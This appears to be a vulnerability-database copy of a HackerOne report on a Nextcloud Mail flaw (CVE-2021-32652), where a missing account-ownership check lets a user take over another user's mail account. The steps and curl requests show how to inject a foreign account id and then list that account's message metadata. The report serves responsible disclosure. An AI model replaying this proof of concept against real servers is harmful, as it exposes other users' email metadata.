Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
hackeroneKesselbH1:1094063
HistoryFeb 03, 2021 - 5:20 p.m.

Nextcloud: Take over a mail account due missing validation of account id

2021-02-0317:20:10
kesselb
hackerone.com
9
nextcloud
mail account
takeover
missing validation
account id
security issue
vulnerability
api
request
csrf

EPSS

0.001

Percentile

21.4%

JSON

A validation is missing to make sure the account id belongs to the logged in user.

To reproduce:

  1. Login as user
  2. Add a mail account to mail
  3. Go to account settings
  4. Update the account again

See a request like below:

curl ‘http://localhost:50001/index.php/apps/mail/api/accounts/{id}
-X ‘PUT’
-H ‘Connection: keep-alive’
-H ‘Pragma: no-cache’
-H ‘Cache-Control: no-cache’
-H ‘Accept: application/json, text/plain, /
-H ‘requesttoken: qsnlh1ctCuo7T2KZ6F/8mxIXHXVpsBvvzPJRqvU+88M=:kqXVxiFjcJJWPjPzvRyO+WNGUB4N1k+ZlaAC2JBtnY0=’
-H ‘User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36’
-H ‘Content-Type: application/json;charset=UTF-8’
-H ‘Origin: http://localhost:50001
-H ‘Sec-Fetch-Site: same-origin’
-H ‘Sec-Fetch-Mode: cors’
-H ‘Sec-Fetch-Dest: empty’
-H ‘Accept-Language: en-US,en;q=0.9,de;q=0.8’
-H ‘Cookie: oc_sessionPassphrase=%2Fsi20cgXowTcmrwZL5Ur%2FUFYByHCAyhwo0Z%2B8V%2Bk2yL9nZpqlzfKOMcxVabLYE7dfTrV1hR7%2Fsnu83fG3GZdiJ5DjHLKD79XaH91L4G%2FNNlD9SbBq%2FMWOIIrYLGqCVnj; nc_sameSiteCookielax=true; nc_sameSiteCookiestrict=true; oc64oi0n8x29=c32fab57ad6d8cbe8e4d8e118f54759a; nc_username=bob; nc_token=HQlkh1JxcSadkeAI8HzBM0ewQDuIfk%2BU; nc_session_id=c32fab57ad6d8cbe8e4d8e118f54759a’
–data-raw ‘{“autoDetect”:false,“accountName”:“bob”,“emailAddress”:“[email protected]”,“imapHost”:“imap”,“imapPort”:993,“imapSslMode”:“ssl”,“imapUser”:“[email protected]”,“imapPassword”:“mypassword”,“smtpHost”:“imap”,“smtpPort”:25,“smtpSslMode”:“tls”,“smtpUser”:“[email protected]”,“smtpPassword”:“mypassword”}’

Take the request and append id to body. id is the account id of another account.

curl ‘http://localhost:50001/index.php/apps/mail/api/accounts/{id}
-X ‘PUT’
-H ‘Connection: keep-alive’
-H ‘Pragma: no-cache’
-H ‘Cache-Control: no-cache’
-H ‘Accept: application/json, text/plain, /
-H ‘requesttoken: qsnlh1ctCuo7T2KZ6F/8mxIXHXVpsBvvzPJRqvU+88M=:kqXVxiFjcJJWPjPzvRyO+WNGUB4N1k+ZlaAC2JBtnY0=’
-H ‘User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36’
-H ‘Content-Type: application/json;charset=UTF-8’
-H ‘Origin: http://localhost:50001
-H ‘Sec-Fetch-Site: same-origin’
-H ‘Sec-Fetch-Mode: cors’
-H ‘Sec-Fetch-Dest: empty’
-H ‘Accept-Language: en-US,en;q=0.9,de;q=0.8’
-H ‘Cookie: oc_sessionPassphrase=%2Fsi20cgXowTcmrwZL5Ur%2FUFYByHCAyhwo0Z%2B8V%2Bk2yL9nZpqlzfKOMcxVabLYE7dfTrV1hR7%2Fsnu83fG3GZdiJ5DjHLKD79XaH91L4G%2FNNlD9SbBq%2FMWOIIrYLGqCVnj; nc_sameSiteCookielax=true; nc_sameSiteCookiestrict=true; oc64oi0n8x29=c32fab57ad6d8cbe8e4d8e118f54759a; nc_username=bob; nc_token=HQlkh1JxcSadkeAI8HzBM0ewQDuIfk%2BU; nc_session_id=c32fab57ad6d8cbe8e4d8e118f54759a’
–data-raw ‘{“autoDetect”:false,“accountName”:“bob”,“emailAddress”:“[email protected]”,“imapHost”:“imap”,“imapPort”:993,“imapSslMode”:“ssl”,“imapUser”:“[email protected]”,“imapPassword”:“mypassword”,“smtpHost”:“imap”,“smtpPort”:25,“smtpSslMode”:“tls”,“smtpUser”:“[email protected]”,“smtpPassword”:“mypassword”,“id”:1}’

The next request to

curl ‘http://localhost:50001/index.php/apps/mail/api/messages?mailboxId=35&filter=is:pi-other&limit=20
-H ‘Connection: keep-alive’
-H ‘Pragma: no-cache’
-H ‘Cache-Control: no-cache’
-H ‘Accept: application/json, text/plain, /
-H ‘requesttoken: 8q7mksjCgQLYbuJqIohYZg6zv8OCkERjy7v4SEW7G9w=:ysLW076M+3q1H7MAd8sqBH/i8qjm9hAVkumrOiDodZI=’
-H ‘User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36’
-H ‘Sec-Fetch-Site: same-origin’
-H ‘Sec-Fetch-Mode: cors’
-H ‘Sec-Fetch-Dest: empty’
-H ‘Accept-Language: en-US,en;q=0.9,de;q=0.8’
-H ‘Cookie: oc_sessionPassphrase=%2Fsi20cgXowTcmrwZL5Ur%2FUFYByHCAyhwo0Z%2B8V%2Bk2yL9nZpqlzfKOMcxVabLYE7dfTrV1hR7%2Fsnu83fG3GZdiJ5DjHLKD79XaH91L4G%2FNNlD9SbBq%2FMWOIIrYLGqCVnj; nc_sameSiteCookielax=true; nc_sameSiteCookiestrict=true; oc64oi0n8x29=c32fab57ad6d8cbe8e4d8e118f54759a; nc_username=bob; nc_token=HQlkh1JxcSadkeAI8HzBM0ewQDuIfk%2BU; nc_session_id=c32fab57ad6d8cbe8e4d8e118f54759a’
–compressed

returns a list of messages like in the screenshot.

Impact

Subject, sender and meta information about some mails are leaked.

Related

prion 1
osv 1
nextcloud 1
cvelist 1
nvd 1
cve 1
prion
prion
Design/Logic Flaw
2021-06-01 19:15:00
osv
osv
CVE-2021-32652
2021-06-01 19:15:07
nextcloud
nextcloud
Missing permission check on email metadata retrieval
2021-06-01 18:06:08
cvelist
cvelist
CVE-2021-32652 Missing permission check on email metadata retrieval
2021-06-01 19:05:11
nvd
nvd
CVE-2021-32652
2021-06-01 19:15:07
cve
cve
CVE-2021-32652
2021-06-01 19:15:07

EPSS

0.001

Percentile

21.4%

JSON
Related for H1:1094063
prion1osv1nextcloud1cvelist1nvd1cve1